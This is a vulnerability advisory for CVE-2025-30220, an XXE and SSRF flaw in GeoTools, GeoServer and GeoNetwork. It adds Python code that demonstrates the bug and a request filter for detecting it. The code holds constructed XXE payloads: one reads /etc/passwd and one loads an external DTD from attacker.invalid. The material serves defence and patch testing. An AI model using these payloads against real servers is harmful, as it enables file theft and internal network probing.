Cyber Resilience

CVE-2025-30220

Critical · Public PoC

Published: 10 June 2025
Modified: 26 August 2025
KEV Added: not listed
Patch: available (fixed versions listed below)
CVSS Score (v3.1): 9.9 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:L)
EPSS Score: 0.1394 (94.5th percentile)
Risk Priority: 28 (weighting: 60% EPSS · 20% KEV · 20% CVSS)

Summary

CVE-2025-30220 is a critical-severity Improper Restriction of XML External Entity Reference (CWE-611) vulnerability in GeoTools (the gt-xsd-core and gt-wfs-ng modules), which also affects the GeoServer and GeoNetwork releases that bundle it. Its CVSS v3.1 base score is 9.9 (Critical).

Operationally, exploitation maps to the MITRE ATT&CK techniques Exploit Public-Facing Application (T1190), Data from Local System (T1005) and Network Service Discovery (T1046). The CVE ranks in the top 5.5% of CVEs by EPSS exploit likelihood, is not currently listed in the CISA KEV catalog, and a public proof-of-concept is referenced.

Deeper analysis

GeoServer is an open source server for sharing and editing geospatial data, and the vulnerability resides in the GeoTools gt-xsd-core Schemas class, which relies on the Eclipse XSD library to handle schema structures. When an XML document references an external schema, Schemas does not apply the EntityResolver configured on the ParserHandler (if one was configured), so external entity and schema references are resolved without restriction, which is XML External Entity processing. The same flaw affects the gt-wfs-ng DataStore because its ENTITY_RESOLVER connection parameter is not honored. The issue impacts GeoServer, GeoTools, and GeoNetwork installations that expose XML parsing paths. Note that the trigger is a reference to an external schema, not only an inline DOCTYPE, so request filtering that strips DTDs alone does not cover this path.

An unauthenticated remote attacker can supply a crafted XML document containing external entity or schema references to trigger XXE or related SSRF behavior. Successful exploitation can yield arbitrary file disclosure (C:H), internal network probing, or limited integrity and availability impact (I:L, A:L), consistent with the CVSS 9.9 rating, which reflects a network attack vector, no required credentials or user interaction, and changed scope.

Official fixes are available in GeoTools 33.1, 32.3, 31.7 and 28.6.1, GeoServer 2.27.1, 2.26.3 and 2.25.7, and GeoNetwork 4.4.8 and 4.2.13. GeoServer documentation recommends explicit configuration to disable external entity resolution, while GeoNetwork has published corresponding pull requests and a security advisory detailing the parameter-handling corrections.
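The defect described above is a wiring bug: a resolver exists in configuration but the class that builds the parser never attaches it. The following is an added example, not GeoTools, GeoServer or GeoNetwork code, that models that bug and its fix with Python's xml.sax, whose EntityResolver plays the role of the ParserHandler resolver. ParserConfig, parse_vulnerable and parse_fixed are stand-ins for ParserHandler and for the Schemas class before and after the fix; the secret file and the request body are constructed for the demonstration.

```python
# Added example (not GeoTools code): models the CVE-2025-30220 defect with Python's
# xml.sax. ParserConfig stands in for ParserHandler, parse_vulnerable/parse_fixed for
# the Schemas class before and after the fix. Secret file and payload are constructed.
import io
import pathlib
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, EntityResolver, feature_external_ges

SECRET = "s3cr3t_token_value"  # constructed; stands in for a file on the server


class RefusingEntityResolver(EntityResolver):
    """Fail-closed resolver: any external entity or DTD reference is an error."""

    def resolveEntity(self, publicId, systemId):
        raise PermissionError(f"refused external entity reference: {systemId}")


class ParserConfig:
    """Stand-in for the GeoTools ParserHandler: holds the resolver an operator configured."""

    def __init__(self, entity_resolver=None):
        self.entity_resolver = entity_resolver


class TextCollector(ContentHandler):
    """Collects character data so we can see what the parser actually expanded."""

    def __init__(self):
        super().__init__()
        self.parts = []

    def characters(self, content):
        self.parts.append(content)

    @property
    def text(self):
        return "".join(self.parts)


def _make_parser():
    parser = xml.sax.make_parser()
    # CPython has shipped with external general entities off since 3.7.1; enable them
    # here to model a Java SAX/XSD pipeline that fetches externals unless told not to.
    parser.setFeature(feature_external_ges, True)
    return parser


def parse_vulnerable(xml_bytes, config):
    """Pre-fix behaviour: the parser is built without consulting config.entity_resolver."""
    parser = _make_parser()
    handler = TextCollector()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(xml_bytes))
    return handler.text


def parse_fixed(xml_bytes, config):
    """Post-fix behaviour: the configured resolver is actually wired into the parser."""
    parser = _make_parser()
    if config.entity_resolver is not None:
        parser.setEntityResolver(config.entity_resolver)
    handler = TextCollector()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(xml_bytes))
    return handler.text


def build_payload(file_uri):
    """Constructed XXE request body: a WFS-shaped element whose content is an external entity."""
    return (
        '<?xml version="1.0"?>\n'
        f'<!DOCTYPE wfs [ <!ENTITY leak SYSTEM "{file_uri}"> ]>\n'
        '<wfs:GetFeature xmlns:wfs="http://www.opengis.net/wfs">&leak;</wfs:GetFeature>'
    ).encode("utf-8")


def run_demo():
    """Returns (text leaked by the unfixed parser, error message from the fixed parser)."""
    with tempfile.TemporaryDirectory() as tmp:
        secret_file = pathlib.Path(tmp) / "secret.txt"
        secret_file.write_text(SECRET, encoding="ascii")
        payload = build_payload(secret_file.as_uri())
        config = ParserConfig(entity_resolver=RefusingEntityResolver())

        leaked = parse_vulnerable(payload, config)  # resolver ignored: file contents come back
        try:
            parse_fixed(payload, config)            # resolver honoured: parse aborts
            refused = None
        except PermissionError as exc:
            refused = str(exc)
    return leaked, refused


if __name__ == "__main__":
    leaked, refused = run_demo()
    print("unfixed parser expanded:", repr(leaked))
    print("fixed parser result:", refused)
```

The check a practitioner wants is the one run_demo performs: feed the same document to the parser with the resolver configured and confirm that the resolver is actually consulted (here, by failing closed) rather than trusting that a configuration parameter such as ENTITY_RESOLVER has any effect. The same test, written against the real Schemas or gt-wfs-ng code path, distinguishes a patched build from an unpatched one.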

The EPSS score stands at 0.1394 (94.5th percentile) and has not risen beyond its recorded peak, indicating that observed exploitation interest, although higher than for most CVEs, has so far remained limited.

Vulnerability details

GeoServer is an open source server that allows users to share and edit geospatial data. The GeoTools Schemas class's use of the Eclipse XSD library to represent the schema data structure is vulnerable to an XML External Entity (XXE) exploit. This impacts whoever exposes XML processing with gt-xsd-core involved in parsing, when the documents carry a reference to an external XML schema. The gt-xsd-core Schemas class does not use the EntityResolver provided by the ParserHandler (if one was configured). This also impacts users of the gt-wfs-ng DataStore, where the ENTITY_RESOLVER connection parameter was not being used as intended. This vulnerability is fixed in GeoTools 33.1, 32.3, 31.7, and 28.6.1, GeoServer 2.27.1, 2.26.3, and 2.25.7, and GeoNetwork 4.4.8 and 4.2.13.

CWE(s)

CWE-611 Improper Restriction of XML External Entity Reference · CWE-918 Server-Side Request Forgery (SSRF)

Related Threats

MITRE ATT&CK Enterprise Techniques (AI-generated mapping)

T1005 Data from Local System (Collection)
Adversaries may search local system sources, such as file systems, configuration files, local databases, virtual machine files, or process memory, to find files of interest and sensitive data prior to Exfiltration.
T1046 Network Service Discovery (Discovery)
Adversaries may attempt to get a listing of services running on remote hosts and local network infrastructure devices, including those that may be vulnerable to remote software exploitation.
T1190 Exploit Public-Facing Application (Initial Access)
Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network.
Why these techniques?

The XXE vulnerability (CWE-611) in GeoServer/GeoNetwork WFS services enables unauthenticated remote exploitation of a public-facing application (T1190), local file disclosure (T1005), and SSRF-driven discovery of internal network services (T1046).

Affected Assets

geotools / geotools (vendor / product)
< 28.6.1 · ≥ 29.0 and < 31.7 · ≥ 32.0 and < 32.3 · 33.0
osgeo / geonetwork
≥ 4.2.0 and < 4.2.13 · ≥ 4.4.0 and < 4.4.8
osgeo / geoserver
< 2.25.7 · ≥ 2.26.0 and < 2.26.3 · 2.27.0
Upper bounds are the first fixed releases named above and are exclusive; the fixed versions themselves are not affected.

Mitigating Controls

Likely Mitigating Controls (AI-generated)

Per-CVE control mapping for this CVE has not run yet; the list below is derived from the weakness types (CWEs) cited in the NVD entry.

Penetration testing includes XML external entity payloads, detecting XXE vulnerabilities and enabling their mitigation.
Addresses: CWE-611, CWE-918

Identifies XML external entity processing via monitoring of unusual file/network access or resource usage.
Addresses: CWE-611, CWE-918

Outbound connections to external resources can be monitored and limited at the boundary, reducing SSRF impact.
Addresses: CWE-918

Validates server-side URLs and resource references to block SSRF attempts.
Addresses: CWE-918
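The last three controls amount to inspecting what an XML request would make the server fetch. As an added example (not GeoServer, GeoNetwork or GeoTools code), the check below runs over constructed WFS request bodies and flags the two paths this CVE is about: inline DTDs that declare external entities (CWE-611) and schema locations that would make the server fetch from a host the operator has not approved (CWE-918). ALLOWED_SCHEMA_HOSTS is an assumed operator allowlist, and the sample bodies, hosts and addresses are constructed for the demonstration.

```python
# Added example (not GeoServer/GeoNetwork code): boundary inspection of raw XML request
# bodies for external entity declarations and non-allowlisted schema locations.
# ALLOWED_SCHEMA_HOSTS and SAMPLE_REQUESTS are assumptions constructed for this demo.
import re
from urllib.parse import urlsplit

ALLOWED_SCHEMA_HOSTS = {"schemas.opengis.net", "www.w3.org"}  # assumed operator allowlist

DOCTYPE_RE = re.compile(rb"<!DOCTYPE\b", re.IGNORECASE)
# <!ENTITY name SYSTEM "..."> or <!ENTITY % name SYSTEM "..."> (parameter entity), PUBLIC too
ENTITY_RE = re.compile(
    rb'<!ENTITY\s+(%\s+)?([^\s>]+)\s+(SYSTEM|PUBLIC)\s+("[^"]*"|\'[^\']*\')',
    re.IGNORECASE,
)
SCHEMA_LOCATION_RE = re.compile(
    rb'\b(noNamespaceSchemaLocation|schemaLocation)\s*=\s*(["\'])(.*?)\2', re.DOTALL
)


def inspect_xml_request(body, allowed_hosts=ALLOWED_SCHEMA_HOSTS):
    """Return findings for one raw XML request body; an empty list means nothing suspicious."""
    findings = []
    if DOCTYPE_RE.search(body):
        findings.append("doctype: inline DTD present")
    for m in ENTITY_RE.finditer(body):
        kind = "parameter" if m.group(1) else "general"
        name = m.group(2).decode("ascii", "replace")
        target = m.group(4).decode("ascii", "replace").strip("\"'")
        findings.append(f"external {kind} entity {name} -> {target}")
    for m in SCHEMA_LOCATION_RE.finditer(body):
        tokens = m.group(3).split()
        # xsi:schemaLocation is "namespace location namespace location ..." and only the
        # locations (odd positions) are fetched; noNamespaceSchemaLocation is locations only.
        locations = tokens[1::2] if m.group(1) == b"schemaLocation" else tokens
        for raw in locations:
            url = raw.decode("ascii", "replace")
            parts = urlsplit(url)
            if not parts.scheme:
                continue  # relative location: no remote host to check here
            if parts.scheme not in ("http", "https"):
                findings.append(f"schema location with non-http scheme: {url}")
            elif parts.hostname not in allowed_hosts:
                findings.append(
                    f"schema location host not allowlisted: {parts.hostname} ({url})"
                )
    return findings


# Constructed sample bodies (not captured traffic). Hosts and addresses are made up.
SAMPLE_REQUESTS = {
    "benign": (
        b'<?xml version="1.0"?>'
        b'<wfs:GetFeature service="WFS" version="1.1.0"'
        b' xmlns:wfs="http://www.opengis.net/wfs"'
        b' xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"'
        b' xsi:schemaLocation="http://www.opengis.net/wfs'
        b' http://schemas.opengis.net/wfs/1.1.0/wfs.xsd">'
        b'<wfs:Query typeName="topp:states"/></wfs:GetFeature>'
    ),
    "dtd_file_read": (
        b'<?xml version="1.0"?>'
        b'<!DOCTYPE wfs [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>'
        b'<wfs:GetFeature xmlns:wfs="http://www.opengis.net/wfs">'
        b'<wfs:Query typeName="&xxe;"/></wfs:GetFeature>'
    ),
    "schema_fetch_ssrf": (
        b'<?xml version="1.0"?>'
        b'<wfs:GetFeature xmlns:wfs="http://www.opengis.net/wfs"'
        b' xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"'
        b' xsi:schemaLocation="http://www.opengis.net/wfs http://10.0.0.5:8080/internal.xsd">'
        b'<wfs:Query typeName="topp:states"/></wfs:GetFeature>'
    ),
    "parameter_entity": (
        b'<?xml version="1.0"?>'
        b'<!DOCTYPE wfs [ <!ENTITY % ext SYSTEM "http://attacker.invalid/evil.dtd"> %ext; ]>'
        b'<wfs:GetFeature xmlns:wfs="http://www.opengis.net/wfs"/>'
    ),
}


def run_all():
    """Inspect every sample and return {name: findings}."""
    return {name: inspect_xml_request(body) for name, body in SAMPLE_REQUESTS.items()}


if __name__ == "__main__":
    for name, findings in run_all().items():
        print(f"{name}: {findings or 'clean'}")
```

This is a pre-parse filter, so it complements rather than replaces the upgrade: it catches the DTD and schemaLocation forms that arrive in the request body, but it cannot see references inside a schema the server has already decided to fetch, which is why the fixed GeoTools releases remain the control that actually closes the path.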
